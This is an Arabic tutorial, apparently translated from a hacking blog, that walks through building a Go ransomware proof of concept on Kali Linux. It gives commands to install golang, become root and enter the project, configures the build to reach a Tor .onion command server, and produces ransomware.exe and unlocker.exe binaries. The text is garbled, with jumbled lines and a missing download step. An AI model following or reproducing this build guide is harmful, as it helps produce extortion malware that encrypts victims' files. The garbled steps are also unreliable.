أصبحت برامج الفدية بسرعة أهم أشكال البرامج الضارة التي تصيب أنظمتنا الرقمية. تتعرض الشركات في جميع أنحاء العالم لأشكال مختلفة من البرامج الضارة بما في ذلك البديل الجديد ، Snake ، المصمم خصيصًا لأنظمة SCADA / ICS. تم إغلاق خط الأنابيب الاستعماري في الولايات المتحدة لمدة أسبوع تقريبًا قبل دفع فدية قدرها 5 ملايين دولار ، مما يدل على خطر برنامج الفدية هذا على الأنظمة الصناعية والبنية التحتية للدولة. في الآونة الأخيرة ، اعترفت شركة التأمين الأمريكية الكبرى ، CNA ، بدفع فدية قدرها 40 مليون دولار! لا عجب أن مطوري برامج الفدية أصبحوا أكثر إبداعًا وخبثًا ، فبرامج الفدية تدفع!
لفهم كيفية عمل برامج الفدية بشكل أفضل ، دعنا نبني برامج الفدية الخاصة بنا من إثبات المفهوم (POC) المتوفر من mauri870 على github.com. لقد طور برنامج الفدية هذا كجزء من برنامجه الأكاديمي ولم يتم تصميمه لأغراض ضارة ولكن بدلاً من ذلك لمساعدتنا في فهم كيفية عمل برامج الفدية. مثل المتغير الجديد ، الأفعى ، وعدد متزايد من سلالات البرامج الضارة ، تمت كتابة هذه البرامج الضارة في Golang.
يقوم هذا البرنامج الضار بتشفير الملفات في الخلفية باستخدام AES-256-CTR ويستخدم RSA-4096 لتأمين تبادل البيانات مع الخادم. يشبه برنامج الفدية هذا إلى حد كبير Cryptolocker ، وهو أحد أنجح هجمات برامج الفدية في التاريخ.
أولا : قم بتنزيل وتثبيت الثنائيات
تتمثل الخطوة الأولى في تشغيل جهاز Kali الخاص بك والتأكد من تثبيت برنامج golang. إذا لم يكن كذلك ، فقم بتنزيله من مستودعات Kali عن طريق إدخال ؛
kali > sudo apt install golang
بعد ذلك ، ستحتاج إلى تسجيل الدخول إلى المستخدم الجذر.
kali > sudo su -
الآن قم بإنشاء دليل للثنائيات. في هذه الحالة ، سميته ببساطة "git".
kali >mkdir git .بعد ذلك ، قم بتغيير الدليل (cd) إلى هذا الدليل
kali > cd git
github الأن نقوم بالتحميل الأداة من موقع
kali > cd ransomware
USE_TOR=truehackersarisegtdj.onion ثانيًا ، نريد استخدام خادم الويب المظلم الخاص بنا على (يمكنك استخدام أي مجال أو مضيف محلي)
SERVER_HOST=hackersarisegtdj.onionثالثًا ، نريد استخدام المنفذ 80 (يمكنك استخدام أي منفذ)
SERVER_PORT=80 Linux أخيرًا ، نريد ضبط نظام التشغيل على تجميع الكود المصدري لنظام التشغيل الخاص بنا ، في هذه الحالة GOOS=linux
kali > ls -l
الأن إنتقل إلى دليل binkali > cd bin
هنا نرى ملف ransomware.exeو الخادم الخاص به unlocker.exekali > cd cmd
kali > more common.go